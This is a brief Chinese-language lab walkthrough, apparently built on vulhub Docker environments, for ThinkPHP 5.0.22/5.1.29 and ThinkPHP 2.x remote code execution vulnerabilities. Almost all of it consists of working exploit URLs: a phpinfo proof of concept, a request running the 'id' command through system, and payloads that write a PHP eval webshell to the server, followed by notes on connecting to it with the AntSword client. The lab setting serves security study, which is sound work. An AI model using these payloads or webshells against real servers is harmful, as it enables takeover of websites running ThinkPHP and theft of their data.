目录
ThinkPHP5 5.0.22/5.1.29远程代码执行漏洞
ThinkPHP5 5.0.22/5.1.29远程代码执行漏洞
环境路径:thinkphp/5-rce
启动环境时修改一下docker-compose.yml 将版本由3改为2即可正常启动
根据提示访问8080端口
POC
http://your-ip:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
system系统命令
http://192.168.20.158:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
写马 a.php
http://192.168.20.158:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=a.php&vars[1][]=%3C?php%20@eval($_POST[a]);%20?%3E
蚁剑连接
拿下webshell
ThinkPHP 2.x 任意代码执行漏洞
环境路径:thinkphp/2-rce
启动环境时修改一下docker-compose.yml 将版本由3改为2即可正常启动
payoad
http://192.168.20.158:8080/index.php?s=/index/index/name/$%7B@phpinfo()%7D
写马payload
http://192.168.20.158:8080/index.php?s=a/b/c/${@print(eval($_POST[a]))}
蚁剑连接
成功拿下webshell